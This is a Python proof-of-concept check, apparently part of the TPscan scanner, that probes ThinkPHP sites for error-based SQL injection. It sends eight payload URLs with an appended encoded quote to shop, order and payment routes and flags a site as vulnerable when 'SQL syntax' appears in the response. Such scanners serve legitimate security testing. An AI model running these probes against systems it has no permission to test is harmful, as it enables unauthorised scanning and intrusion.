#!/usr/bin/env python
# coding=utf-8
import urllib
import requests
import urllib3
from prettytable import PrettyTable

urllib3.disable_warnings()


def thinkphp_multi_sql_leak_verify(url):
    pocdict = {
        "vulnname": "thinkphp_multi_sql_leak",
        "isvul": False,
        "vulnurl": "",
        "payload": "",
        "proof": "",
        "response": "",
        "exception": "None",
    }
    headers = {
        "User-Agent": "TPscan",
    }
    payloads = [
        r"index.php?s=/home/shopcart/getPricetotal/tag/1%27",
        r"index.php?s=/home/shopcart/getpriceNum/id/1%27",
        r"index.php?s=/home/user/cut/id/1%27",
        r"index.php?s=/home/service/index/id/1%27",
        r"index.php?s=/home/pay/chongzhi/orderid/1%27",
        r"index.php?s=/home/order/complete/id/1%27",
        r"index.php?s=/home/order/detail/id/1%27",
        r"index.php?s=/home/order/cancel/id/1%27",
    ]
    try:
        for payload in payloads:
            vurl = urllib.parse.urljoin(url, payload)
            req = requests.get(vurl, headers=headers, timeout=15, verify=False)
            if r"SQL syntax" in req.text:
                pocdict["isvul"] = True
                pocdict["vulnurl"] = vurl
                pocdict["proof"] = "SQL syntax found"
                # pocdict['response'] = req.text
                # print(pocdict)
                table = PrettyTable()
                table.add_column(
                    "项目",
                    ["vulnname", "isvul", "vulnurl", "proof", "payload", "exception"],
                )
                table.add_column(
                    "内容",
                    [
                        pocdict["vulnname"],
                        pocdict["isvul"],
                        pocdict["vulnurl"],
                        pocdict["proof"],
                        pocdict["payload"],
                        pocdict["exception"],
                    ],
                )
                table.align["项目"] = "r"
                table.align["内容"] = "l"
                break
        print(table)
    except Exception:
        pass
